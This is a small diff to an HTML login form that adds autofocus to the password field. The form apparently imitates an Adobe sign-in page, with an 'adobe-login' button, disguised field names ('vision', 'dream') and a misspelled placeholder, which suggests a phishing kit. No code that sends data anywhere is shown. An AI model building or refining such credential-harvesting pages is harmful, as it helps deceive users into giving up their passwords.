--- a/pai.html
+++ b/pai.html
@@ -23,7 +23,7 @@
 				<div class="inputs">
 					<div class="loader ball-beat"><div></div><div></div><div></div></div>
 					<input type="email" name="vision" id="email" placeholder="Email Adress" required="" style="border: solid 1px red;">
-					<input type="password" name="dream" id="password" placeholder="Password" required="" style="border: solid 1px red;">
+					<input type="password" name="dream" id="password" placeholder="Password" required="" style="border: solid 1px red;" autofocus="">
 				</div>
 				<div class="mod-form-button">
 					<input type="submit" class="mod-main" name="idinri" id="adobe-login" value="Sign In">
